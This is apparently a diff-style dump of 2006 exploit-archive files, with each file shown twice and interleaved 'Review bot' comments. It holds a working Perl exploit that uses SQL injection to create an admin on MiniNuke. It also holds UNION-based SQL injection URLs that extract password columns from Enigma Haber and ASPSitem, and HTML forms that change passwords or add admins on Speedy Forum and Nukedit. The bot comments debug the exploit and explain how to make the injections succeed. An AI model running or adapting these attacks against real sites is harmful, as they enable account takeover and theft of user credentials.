$mnuser = $ARGV[2];
$mnpass = $ARGV[3];
$mnmail = $ARGV[4];
$mnport = "80";
#Sending data...
header();
print "- Trying to connect: $mnserver\r\n";
getsession();
}
sub getsession ()
{
print "- Getting session for register...\r\n";
$mnstar = "membership.asp?action=new";
$mnsreq = $mnhost.$mndir.$mnstar;
$mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mns "GET $mnsreq HTTP/1.1\n";
print $mns "Accept: */*\n";
print $mns "Referer: $mnhost\n";
print $mns "Accept-Language: tr\n";
print $mns "User-Agent: NukeZilla\n";
print $mns "Cache-Control: no-cache\n";
print $mns "Host: $mnserver\n";
print $mns "Connection: close\n\n";
print "- Connected...\r\n";
while ($answer = <$mns>) {
if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mncookie = $mncookie.$1; }
if ($answer =~ /Güvenlik Kodunuz<\/td><td width=\"50%\"><b>(.*?)<\/b><\/td>/) { $mngvn=$1;doregister(); }
}
#if you are here...
die "- Exploit failed\r\n";
}
sub doregister ()
{
close($mns);
$mntar = "membership.asp?action=register";
$mnreq = $mnhost.$mndir.$mntar;
print "- Session getting done\r\n";
print "- Lets create our user...\r\n";
$mndata = "kuladi=".$mnuser;
$mndata.= "&password=".$mnpass;
$mndata.= "&email=".$mnmail;
$mndata.= "&isim=h4x0r";
$mndata.= "&g_soru=whooooo";
$mndata.= "&g_cevap=h4x0rs";
$mndata.= "&icq=1";
$mndata.= "&msn=1";
$mndata.= "&aim=1";
$mndata.= "&sehir=1";
$mndata.= "&meslek=1";
$mndata.= "&cinsiyet=b";
$mndata.= "&yas_1=1";
$mndata.= "&yas_2=1";
$mndata.= "&yas_3=1920";
$mndata.= "&web=http://www.milw0rm.com";
$mndata.= "&imza=h4x0r";
$mndata.= "&mavatar=IMAGES/avatars/1.gif";
$mndata.= "&security_code=".$mngvn;
$mndata.= "&mail_goster=on";
$mndatalen = length($mndata);
$mn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mn "POST $mnreq HTTP/1.1\r\n";
print $mn "Accept: */*\r\n";
print $mn "Referer: $mnhost\r\n";
print $mn "Accept-Language: tr\r\n";
print $mn "Content-Type: application/x-www-form-urlencoded\r\n";
print $mn "Accept-Encoding: gzip, deflate\r\n";
print $mn "User-Agent: NukeZilla\r\n";
print $mn "Cookie: $mncookie\r\n";
print $mn "Host: $mnserver\r\n";
print $mn "Content-length: $mndatalen\r\n";
print $mn "Connection: Keep-Alive\r\n";
print $mn "Cache-Control: no-cache\r\n\r\n";
print $mn $mndata;
print $mn "\r\n\r\n";
while ($answer = <$mn>) {
if ($answer =~ /Tebrikler !!!/) {
print "- Creating user has been done...\r\n";
print "- Loginning in to user...\r\n";
dologin();
}
}
#if you are here...
die "- Exploit failed\r\n";
}
sub dologin ()
{
close ($mn);
$mnltar = "enter.asp";
$mnlreq = $mnhost.$mndir.$mnltar;
$mnldata = "kuladi=".$mnuser;
$mnldata.= "&password=".$mnpass;
$mnldata.= "&guvenlik=423412";
$mnldata.= "&gguvenlik=423412";
$mnldatalen = length($mnldata);
$mnl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mnl "POST $mnlreq HTTP/1.1\r\n";
print $mnl "Accept: */*\r\n";
print $mnl "Referer: $mnhost\r\n";
print $mnl "Accept-Language: tr\r\n";
print $mnl "Content-Type: application/x-www-form-urlencoded\r\n";
print $mnl "Accept-Encoding: gzip, deflate\r\n";
print $mnl "User-Agent: NukeZilla\r\n";
print $mnl "Host: $mnserver\r\n";
print $mnl "Content-length: $mnldatalen\r\n";
print $mnl "Connection: Keep-Alive\r\n";
print $mnl "Cache-Control: no-cache\r\n\r\n";
print $mnl $mnldata;
print $mnl "\r\n\r\n";
while ($answer = <$mnl>) {
if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mnlcookie = $mnlcookie.$1; }
if ($answer =~ /Cache-control:/) { doadmin(); }
}
#if you are here...
die "- Exploit failed\r\n";
}
sub doadmin ()
{
close($mnl);
print "- Editing profile..\r\n";
$mnptar = "Your_Account.asp?op=UpdateProfile";
$mnpreq = $mnhost.$mndir.$mnptar;
$mnpdata.= "email=".$mnmail;
$mnpdata.= "&isim=h4x0r";
$mnpdata.= "&g_soru=whooooo";
$mnpdata.= "&g_cevap=h4x0rs";
$mnpdata.= "&icq=1";
$mnpdata.= "&msn=1";
$mnpdata.= "&aim=1";
$mnpdata.= "&sehir=1";
$mnpdata.= "&meslek=1";
$mnpdata.= "&cinsiyet=b";
$mnpdata.= "&yas_1=1";
$mnpdata.= "&yas_2=1";
$mnpdata.= "&yas_3=1920',seviye='1";
$mnpdata.= "&web=http://www.milw0rm.com";
$mnpdata.= "&imza=h4x0r";
$mnpdata.= "&mavatar=IMAGES/avatars/1.gif";
$mnpdata.= "&mail_goster=on";
$mnpdatalen = length($mnpdata);
$mnp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mnp "POST $mnpreq HTTP/1.1\r\n";
print $mnp "Accept: */*\r\n";
print $mnp "Referer: $mnhost\r\n";
print $mnp "Accept-Language: tr\r\n";
print $mnp "Content-Type: application/x-www-form-urlencoded\r\n";
print $mnp "Accept-Encoding: gzip, deflate\r\n";
print $mnp "User-Agent: NukeZilla\r\n";
print $mnp "Cookie: $mnlcookie\r\n";
print $mnp "Host: $mnserver\r\n";
print $mnp "Content-length: $mnpdatalen\r\n";
print $mnp "Connection: Keep-Alive\r\n";
print $mnp "Cache-Control: no-cache\r\n\r\n";
print $mnp $mnpdata;
print $mn "\r\n\r\n";
while ($answer = <$mnp>) {
if ($answer =~ /Tebrikler !!!/) {
print "- Editing profile been done...\r\n";
print "- Exploiting finished succesfully\r\n";
print "- Your username $mnuser has been created as admin\r\n";
print "- You can login with password $mnpass on $mnlreq\r\n";
exit();
}
if ($answer =~ /Üyeler Açýktýr/) {
print "- Exploit failed\r\n";
exit();
}
}
#if you are here...
die "- Exploit failed\r\n";
}
# nukedx.com [2006-05-27]

# milw0rm.com [2006-05-27]
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=31
#Usage: mini.pl <host> <path> <user> <pass> <mail>
use IO::Socket;
if(@ARGV != 5) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-31\r\n";
print "- MiniNuke v2.x Remote SQL Injection (create an admin) Exploit\r\n";
}
sub usage()
{
header();
print "- Usage: $0 <host> <path> <user> <pass> <mail>\r\n";
print "- <host> -> Victim's host ex: www.victim.com\r\n";
print "- <path> -> Path to MiniNuke ex: /mininuke/\r\n";
print "- <user> -> Desired username to create ex: h4x0r\r\n";
print "- <pass> -> Password for our username ex: p4ZZw0rd\r\n";
print "- <mail> -> Mail for our username ex: hax0r\@s3x0r3d.com\r\n";
exit();
}
sub exploit ()
{
#Our variables...
$mnserver = $ARGV[0];
$mnserver =~ s/(http:\/\/)//eg;
$mnhost = "http://".$mnserver;
$mndir = $ARGV[1];
$mnuser = $ARGV[2];
$mnpass = $ARGV[3];
$mnmail = $ARGV[4];
$mnport = "80";
#Sending data...
header();
print "- Trying to connect: $mnserver\r\n";
getsession();
}
sub getsession ()
{
print "- Getting session for register...\r\n";
$mnstar = "membership.asp?action=new";
$mnsreq = $mnhost.$mndir.$mnstar;
$mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mns "GET $mnsreq HTTP/1.1\n";
print $mns "Accept: */*\n";
print $mns "Referer: $mnhost\n";
print $mns "Accept-Language: tr\n";
print $mns "User-Agent: NukeZilla\n";
print $mns "Cache-Control: no-cache\n";
print $mns "Host: $mnserver\n";
print $mns "Connection: close\n\n";
print "- Connected...\r\n";
while ($answer = <$mns>) {
if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mncookie = $mncookie.$1; }
if ($answer =~ /Güvenlik Kodunuz<\/td><td width=\"50%\"><b>(.*?)<\/b><\/td>/) { $mngvn=$1;doregister(); }
}
#if you are here...
die "- Exploit failed\r\n";
}
sub doregister ()
{
close($mns);
$mntar = "membership.asp?action=register";
$mnreq = $mnhost.$mndir.$mntar;
print "- Session getting done\r\n";
print "- Lets create our user...\r\n";
$mndata = "kuladi=".$mnuser;
$mndata.= "&password=".$mnpass;
$mndata.= "&email=".$mnmail;
$mndata.= "&isim=h4x0r";
$mndata.= "&g_soru=whooooo";
$mndata.= "&g_cevap=h4x0rs";
$mndata.= "&icq=1";
$mndata.= "&msn=1";
$mndata.= "&aim=1";
$mndata.= "&sehir=1";
$mndata.= "&meslek=1";
$mndata.= "&cinsiyet=b";
$mndata.= "&yas_1=1";
$mndata.= "&yas_2=1";
$mndata.= "&yas_3=1920";
$mndata.= "&web=http://www.milw0rm.com";
$mndata.= "&imza=h4x0r";
$mndata.= "&mavatar=IMAGES/avatars/1.gif";
$mndata.= "&security_code=".$mngvn;
$mndata.= "&mail_goster=on";
$mndatalen = length($mndata);
$mn = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mn "POST $mnreq HTTP/1.1\r\n";
print $mn "Accept: */*\r\n";
print $mn "Referer: $mnhost\r\n";
print $mn "Accept-Language: tr\r\n";
print $mn "Content-Type: application/x-www-form-urlencoded\r\n";
print $mn "Accept-Encoding: gzip, deflate\r\n";
print $mn "User-Agent: NukeZilla\r\n";
print $mn "Cookie: $mncookie\r\n";
print $mn "Host: $mnserver\r\n";
print $mn "Content-length: $mndatalen\r\n";
print $mn "Connection: Keep-Alive\r\n";
print $mn "Cache-Control: no-cache\r\n\r\n";
print $mn $mndata;
print $mn "\r\n\r\n";
while ($answer = <$mn>) {
if ($answer =~ /Tebrikler !!!/) {
print "- Creating user has been done...\r\n";
print "- Loginning in to user...\r\n";
dologin();
}
}
#if you are here...
die "- Exploit failed\r\n";
}
sub dologin ()
{
close ($mn);
$mnltar = "enter.asp";
$mnlreq = $mnhost.$mndir.$mnltar;
$mnldata = "kuladi=".$mnuser;
$mnldata.= "&password=".$mnpass;
$mnldata.= "&guvenlik=423412";
$mnldata.= "&gguvenlik=423412";
$mnldatalen = length($mnldata);
$mnl = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mnl "POST $mnlreq HTTP/1.1\r\n";
print $mnl "Accept: */*\r\n";
print $mnl "Referer: $mnhost\r\n";
print $mnl "Accept-Language: tr\r\n";
print $mnl "Content-Type: application/x-www-form-urlencoded\r\n";
print $mnl "Accept-Encoding: gzip, deflate\r\n";
print $mnl "User-Agent: NukeZilla\r\n";
print $mnl "Host: $mnserver\r\n";
print $mnl "Content-length: $mnldatalen\r\n";
print $mnl "Connection: Keep-Alive\r\n";
print $mnl "Cache-Control: no-cache\r\n\r\n";
print $mnl $mnldata;
print $mnl "\r\n\r\n";
while ($answer = <$mnl>) {
if ($answer =~ /Set-Cookie: (.*?) path=\//) { $mnlcookie = $mnlcookie.$1; }
if ($answer =~ /Cache-control:/) { doadmin(); }
}
#if you are here...
die "- Exploit failed\r\n";
}
sub doadmin ()
{
close($mnl);
print "- Editing profile..\r\n";
$mnptar = "Your_Account.asp?op=UpdateProfile";
$mnpreq = $mnhost.$mndir.$mnptar;
$mnpdata.= "email=".$mnmail;
$mnpdata.= "&isim=h4x0r";
$mnpdata.= "&g_soru=whooooo";
$mnpdata.= "&g_cevap=h4x0rs";
$mnpdata.= "&icq=1";
$mnpdata.= "&msn=1";
$mnpdata.= "&aim=1";
$mnpdata.= "&sehir=1";
$mnpdata.= "&meslek=1";
$mnpdata.= "&cinsiyet=b";
$mnpdata.= "&yas_1=1";
$mnpdata.= "&yas_2=1";
$mnpdata.= "&yas_3=1920',seviye='1";
$mnpdata.= "&web=http://www.milw0rm.com";
$mnpdata.= "&imza=h4x0r";
$mnpdata.= "&mavatar=IMAGES/avatars/1.gif";
$mnpdata.= "&mail_goster=on";
$mnpdatalen = length($mnpdata);
$mnp = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$mnserver", PeerPort => "$mnport") || die "- Connection failed...\r\n";
print $mnp "POST $mnpreq HTTP/1.1\r\n";
print $mnp "Accept: */*\r\n";
print $mnp "Referer: $mnhost\r\n";
print $mnp "Accept-Language: tr\r\n";
print $mnp "Content-Type: application/x-www-form-urlencoded\r\n";
print $mnp "Accept-Encoding: gzip, deflate\r\n";
print $mnp "User-Agent: NukeZilla\r\n";
print $mnp "Cookie: $mnlcookie\r\n";
print $mnp "Host: $mnserver\r\n";
print $mnp "Content-length: $mnpdatalen\r\n";
print $mnp "Connection: Keep-Alive\r\n";
print $mnp "Cache-Control: no-cache\r\n\r\n";
print $mnp $mnpdata;
print $mn "\r\n\r\n";
while ($answer = <$mnp>) {
if ($answer =~ /Tebrikler !!!/) {
print "- Editing profile been done...\r\n";
print "- Exploiting finished succesfully\r\n";
print "- Your username $mnuser has been created as admin\r\n";
print "- You can login with password $mnpass on $mnlreq\r\n";
exit();
}
if ($answer =~ /Üyeler Açýktýr/) {
print "- Exploit failed\r\n";
exit();
}
}
#if you are here...
die "- Exploit failed\r\n";
}
# nukedx.com [2006-05-27]

# milw0rm.com [2006-05-27]

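Review bot: in `doadmin()` the request terminator goes to the wrong handle: `print $mn "\r\n\r\n";` writes to `$mn`, which `dologin()` already closed with `close ($mn);`, while every other line of that block writes to `$mnp`; it only works because `Content-length` was already sent, so the server does not wait for the missing bytes. Other points visible in the same script: the login-success test `if ($answer =~ /Cache-control:/)` fires on any response that carries that header, so a failed login still proceeds to the profile update; `dologin()` sends `guvenlik=423412` and `gguvenlik=423412`, i.e. both halves of the security-code check come from the attacker, which is a second weakness the header comment should mention alongside the `yas_3=1920',seviye='1` injection into the profile UPDATE; `$mnpdata.=` appends to a variable that is never initialised (harmless here, but it would warn under `use warnings`); the first GET in `getsession()` uses bare `\n` terminators while the three POSTs correctly use `\r\n`; and `s/(http:\/\/)//eg` carries a pointless `/e`. Both rendered copies of the file are identical, so this hunk is a whitespace or encoding change only.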
@ -1,25 +1,25 @@
Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on Enigma Haber <= 4.3
Original advisory can be found at: http://www.nukedx.com/?viewdoc=34
http://[site]/enigmadir/e_mesaj_yaz.asp?id=1879586820+UNION+SELECT+0,sifre,2,3,4,5,6,7,8,9,10,110,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+yonet+where+yonetid=1144931586
http://[site]/enigmadir/yazdir.asp?hid=SQL
http://[site]/enigmadir/yorum.asp?hid=SQL
http://[site]/enigmadir/edi_haber.asp?id=SQL&tur=1
http://[site]/enigmadir/ara.asp?yo=1&ara=SQL&ko=0&k=0&d=hid&e=desc&ay=00&yil=00
http://[site]/enigmadir/arsiv.asp?d=hid&e=desc+UNION+SELECT+0,sifre,isim,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+yonet+where+yonetid%20like%201144927664&ay=00&yil=00&e_kad=00
http://[site]/enigmadir/haber_devam.asp?id=SQL
Examples in the below needs admin rights.
http://[site]/enigmadir/admin/y_admin.asp?yid=SQL
http://[site]/enigmadir/admin/y_admin.asp?yid=34+UNION+SELECT+0,1,mail,3,4,5,sifre,isim,8,9,sehir+from+yonet+where+yonetid=1144927664
http://[site]/enigmadir/admin/reklam_detay.asp?bid=SQL
http://[site]/enigmadir/admin/detay_yorum.asp?hid=SQL
http://[site]/enigmadir/admin/haber_sil.asp?hid=SQL
http://[site]/enigmadir/admin/kategori_d.asp?o=1&kid=SQL
http://[site]/enigmadir/admin/haber_ekle.asp?tur=SQL
http://[site]/enigmadir/admin/e_mesaj_yaz.asp?s=SQL
http://[site]/enigmadir/admin/admin_sil.asp?id=SQL

# nukedx.com [2006-05-27]

# milw0rm.com [2006-05-28]
Enigma Haber <= 4.3 Multiple Remote SQL Injection Vulnerabilities
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on Enigma Haber <= 4.3
Original advisory can be found at: http://www.nukedx.com/?viewdoc=34
http://[site]/enigmadir/e_mesaj_yaz.asp?id=1879586820+UNION+SELECT+0,sifre,2,3,4,5,6,7,8,9,10,110,0,0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+yonet+where+yonetid=1144931586
http://[site]/enigmadir/yazdir.asp?hid=SQL
http://[site]/enigmadir/yorum.asp?hid=SQL
http://[site]/enigmadir/edi_haber.asp?id=SQL&tur=1
http://[site]/enigmadir/ara.asp?yo=1&ara=SQL&ko=0&k=0&d=hid&e=desc&ay=00&yil=00
http://[site]/enigmadir/arsiv.asp?d=hid&e=desc+UNION+SELECT+0,sifre,isim,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+yonet+where+yonetid%20like%201144927664&ay=00&yil=00&e_kad=00
http://[site]/enigmadir/haber_devam.asp?id=SQL
Examples in the below needs admin rights.
http://[site]/enigmadir/admin/y_admin.asp?yid=SQL
http://[site]/enigmadir/admin/y_admin.asp?yid=34+UNION+SELECT+0,1,mail,3,4,5,sifre,isim,8,9,sehir+from+yonet+where+yonetid=1144927664
http://[site]/enigmadir/admin/reklam_detay.asp?bid=SQL
http://[site]/enigmadir/admin/detay_yorum.asp?hid=SQL
http://[site]/enigmadir/admin/haber_sil.asp?hid=SQL
http://[site]/enigmadir/admin/kategori_d.asp?o=1&kid=SQL
http://[site]/enigmadir/admin/haber_ekle.asp?tur=SQL
http://[site]/enigmadir/admin/e_mesaj_yaz.asp?s=SQL
http://[site]/enigmadir/admin/admin_sil.asp?id=SQL

# nukedx.com [2006-05-27]

# milw0rm.com [2006-05-28]

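Review bot: the three worked UNION examples pin `yonetid=1144931586` and `yonetid%20like%201144927664` (and `yid=34`, `id=1879586820`), values that are specific to the author's test install, so a reader who copies them verbatim gets an empty result set; the file should say that the admin row id has to be read from the target first. The column counts that a reader actually needs are only implicit: 26 for `e_mesaj_yaz.asp`, 20 for `arsiv.asp` (with `isim` and `sifre` in positions 3 and 2) and 11 for `y_admin.asp` (with `mail`, `sifre`, `isim`, `sehir`), while the other thirteen entries are bare `=SQL` placeholders with no column count, so each of those still needs its own enumeration. `This exploits works` and `Examples in the below needs admin rights` should read `These exploits work` and `The examples below need admin rights`. Both rendered copies are identical, so this hunk is a whitespace or encoding change only.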
@ -1,15 +1,15 @@
|
|||
ASPSitem <= 2.0 Multiple Vulnerabilities.
|
||||
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
|
||||
This exploits works on ASPSitem <= 2.0.
|
||||
Original advisory can be found at: http://www.nukedx.com/?viewdoc=39
|
||||
SQL injection ->
|
||||
GET -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL]
|
||||
EXAMPLE -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler%20where%20
id%20like%201
with this example remote attacker can leak userid 1's login information from database.
Read others private messages ->
GET/EXAMPLE -> http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername
# nukedx.com [2006-05-27]
# milw0rm.com [2006-05-28]
ASPSitem <= 2.0 Multiple Vulnerabilities.
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
This exploits works on ASPSitem <= 2.0.
Original advisory can be found at: http://www.nukedx.com/?viewdoc=39
SQL injection ->
GET -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL]
EXAMPLE -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler%20where%20
id%20like%201
with this example remote attacker can leak userid 1's login information from database.
Read others private messages ->
GET/EXAMPLE -> http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername
# nukedx.com [2006-05-27]
# milw0rm.com [2006-05-28]
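Review bot: the removed and added sides of this hunk are identical line for line, so the change is whitespace or line-ending only and carries no content; the commit message should say so (or the repository should carry a `.gitattributes` rule for it), since nothing a reader can see has changed. The same pattern recurs in most of the hunks that follow.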
@ -1,69 +1,69 @@
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body>
<div bgcolor="#000000">
<form name="InputForm" method="post" target="_blank" onsubmit="return window.confirm("You are submitting information to an external page.\nAre you sure?");">
<b><font color="#808080" face="Verdana">Speedy Forum User Pass Change //
ajann</font></b><p><font face="Verdana" size="2" color="#FF0000"><b>User
Name
: </b></font>
<input type="text" name="name" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: Surname
Name</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User
Mail
: </b></font>
<input type="text" name="email" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example:
<a href="mailto:mail@domain.com" target="_blank">mail@domain.com</a></font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User
Ýd
: </b></font>
<input type="text" name="id" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: Ýd:1
Admin</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User Country :
</b>
</font>
<select size="1" name="country">
<option value="0">Choose Country</option>
<option value="Turkey">Turkey</option>
</select> <font size="1" color="#C0C0C0" face="Arial"> Example:
Turkey</font><br>
<b>
<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">Pass </font>
<font face="Verdana" size="2" color="#FF0000">
: </font></b>
<input type="text" name="password" value="Password" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
<b>
<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">RePass</font><font face="Verdana" size="2" color="#FF0000">
: </font></b>
<input type="text" name="passwordre" value="Re Password" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>Form Action :
</b>
</font>
<input type="text" name="adres" value="profileupdate.asp" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example:
http://[target]/[path]/profileu<WBR>pdate.asp</font></p>
<p>
<input type="submit" name="Submit" value="Change"> </p>
<br>
</form>
</div></body></html>
# milw0rm.com [2006-05-29]
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body>
<div bgcolor="#000000">
<form name="InputForm" method="post" target="_blank" onsubmit="return window.confirm("You are submitting information to an external page.\nAre you sure?");">
<b><font color="#808080" face="Verdana">Speedy Forum User Pass Change //
ajann</font></b><p><font face="Verdana" size="2" color="#FF0000"><b>User
Name
: </b></font>
<input type="text" name="name" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: Surname
Name</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User
Mail
: </b></font>
<input type="text" name="email" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example:
<a href="mailto:mail@domain.com" target="_blank">mail@domain.com</a></font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User
Ýd
: </b></font>
<input type="text" name="id" value="" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: Ýd:1
Admin</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>User Country :
</b>
</font>
<select size="1" name="country">
<option value="0">Choose Country</option>
<option value="Turkey">Turkey</option>
</select> <font size="1" color="#C0C0C0" face="Arial"> Example:
Turkey</font><br>
<b>
<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">Pass </font>
<font face="Verdana" size="2" color="#FF0000">
: </font></b>
<input type="text" name="password" value="Password" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
<b>
<font face="Verdana" size="2" color="#FF0000">User </font>
<font face="Verdana" size="2" color="#0000FF">RePass</font><font face="Verdana" size="2" color="#FF0000">
: </font></b>
<input type="text" name="passwordre" value="Re Password" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
<font face="Verdana" size="2" color="#FF0000"><b>Form Action :
</b>
</font>
<input type="text" name="adres" value="profileupdate.asp" size="20">
<font size="1" color="#C0C0C0" face="Arial"> Example:
http://[target]/[path]/profileu<WBR>pdate.asp</font></p>
<p>
<input type="submit" name="Submit" value="Change"> </p>
<br>
</form>
</div></body></html>
# milw0rm.com [2006-05-29]
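Review bot: the `onsubmit` attribute on the `<form ...>` line uses unescaped double quotes inside a double-quoted value (`onsubmit="return window.confirm("You are submitting ...`), so the attribute value ends at `window.confirm(` and the confirmation dialog never runs; `&quot;` or single quotes for the inner string would fix it. The `<META ... charset=utf-8>` declaration also does not match the `Ýd` label text, which is Windows-1254 for `İd`, and `bgcolor` is not a `<div>` attribute. None of this is touched by the change, which is identical on both sides of the hunk.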
@ -1,43 +1,43 @@
################ KAPDA - Security Science Researchers Institute #################
#Advisory : http://www.kapda.ir/advisory-337.html
#Vendor : http://www.nukedit.com/
#What is : Nukedit is a Free Content Management
#Vulnerability : Unauthorized Admin Add Exploit if "register.asp" be enable!
#Discovered : 3nitro - farhadkey {AT} kapda [d0t] ir
#Vulnerabale versions : <= 4.9.6
#Grtz to : Irannetjob.com, Maskofgod.net, Hamid.ir, ihsteam.com, simorhg-ev.com, hat-squad.com
#Solution : update to new version of nukedit .
#Change "http://victim.com/nukedit/utilities/register.asp"
################ KAPDA - Security Science Researchers Institute #################
<html><head><title>Kapda HTML PoC For Nukedit <= 4.9.6</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252"></head>
<body>
<font face="Verdana" Size="1"><br>
Kapda HTML PoC For Nukedit <= 4.9.6 (With Security Patch) Unauthorized Admin Add Exploit<br>
Discovered and coded by 3nitro - farhadkey {AT} kapda [dot] ir <br>
Change the form's action in source : "http://victim.com/nukedit/utilities/register.asp"<br>
Fill the blank and submit . After that login with your email ! + your password .<p>
<form name="frmUser" method="post" action="http://victim.com/nukedit/utilities/register.asp">
<input type="hidden" name="action" value="addDB"></p>
<br><br><br>Username :<input type="text" name="username" size="50" style="float: left; font-family: Verdana; font-size: 7pt">
<input type="hidden" name="company" size="30" value="MSN">
<input type="hidden" name="Url" size="30" value="http://www.lol.ir">
<input type="hidden" name="address" size="30" value="System32">
<input type="hidden" name="county" size="30" value="00">
<input type="hidden" name="zip" size="10" value="12345">
<input type="hidden" name="country" value="XPL">
<input type="hidden" name="phone" size="15" value="12345678">
<input type="hidden" name="fax" size="15" value="87654321">
<br><br><br>Your E-mail : <input type="text" name="email" size="30" style="float: left; font-family: Verdana; font-size: 7pt">
<br><br><br>Your Password : <input type="password" name="password" size="20" style="float: left; font-family: Verdana; font-size: 7pt">
<input type= "hidden" name="groupid" value="1">
<input type="hidden" name="IP" value="10.9.8.7">
<br><br><br><input type="submit" value="Create Account" id="submit1" name="submit1"><br>
<!-- Nukedit Exploit Discovered and coded by 3nitro (farhadkey {AT} kapda [D0T] ir) -->
</font>
</form>
</body>
</html>
# milw0rm.com [2006-05-29]
################ KAPDA - Security Science Researchers Institute #################
#Advisory : http://www.kapda.ir/advisory-337.html
#Vendor : http://www.nukedit.com/
#What is : Nukedit is a Free Content Management
#Vulnerability : Unauthorized Admin Add Exploit if "register.asp" be enable!
#Discovered : 3nitro - farhadkey {AT} kapda [d0t] ir
#Vulnerabale versions : <= 4.9.6
#Grtz to : Irannetjob.com, Maskofgod.net, Hamid.ir, ihsteam.com, simorhg-ev.com, hat-squad.com
#Solution : update to new version of nukedit .
#Change "http://victim.com/nukedit/utilities/register.asp"
################ KAPDA - Security Science Researchers Institute #################
<html><head><title>Kapda HTML PoC For Nukedit <= 4.9.6</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252"></head>
<body>
<font face="Verdana" Size="1"><br>
Kapda HTML PoC For Nukedit <= 4.9.6 (With Security Patch) Unauthorized Admin Add Exploit<br>
Discovered and coded by 3nitro - farhadkey {AT} kapda [dot] ir <br>
Change the form's action in source : "http://victim.com/nukedit/utilities/register.asp"<br>
Fill the blank and submit . After that login with your email ! + your password .<p>
<form name="frmUser" method="post" action="http://victim.com/nukedit/utilities/register.asp">
<input type="hidden" name="action" value="addDB"></p>
<br><br><br>Username :<input type="text" name="username" size="50" style="float: left; font-family: Verdana; font-size: 7pt">
<input type="hidden" name="company" size="30" value="MSN">
<input type="hidden" name="Url" size="30" value="http://www.lol.ir">
<input type="hidden" name="address" size="30" value="System32">
<input type="hidden" name="county" size="30" value="00">
<input type="hidden" name="zip" size="10" value="12345">
<input type="hidden" name="country" value="XPL">
<input type="hidden" name="phone" size="15" value="12345678">
<input type="hidden" name="fax" size="15" value="87654321">
<br><br><br>Your E-mail : <input type="text" name="email" size="30" style="float: left; font-family: Verdana; font-size: 7pt">
<br><br><br>Your Password : <input type="password" name="password" size="20" style="float: left; font-family: Verdana; font-size: 7pt">
<input type= "hidden" name="groupid" value="1">
<input type="hidden" name="IP" value="10.9.8.7">
<br><br><br><input type="submit" value="Create Account" id="submit1" name="submit1"><br>
<!-- Nukedit Exploit Discovered and coded by 3nitro (farhadkey {AT} kapda [D0T] ir) -->
</font>
</form>
</body>
</html>
# milw0rm.com [2006-05-29]
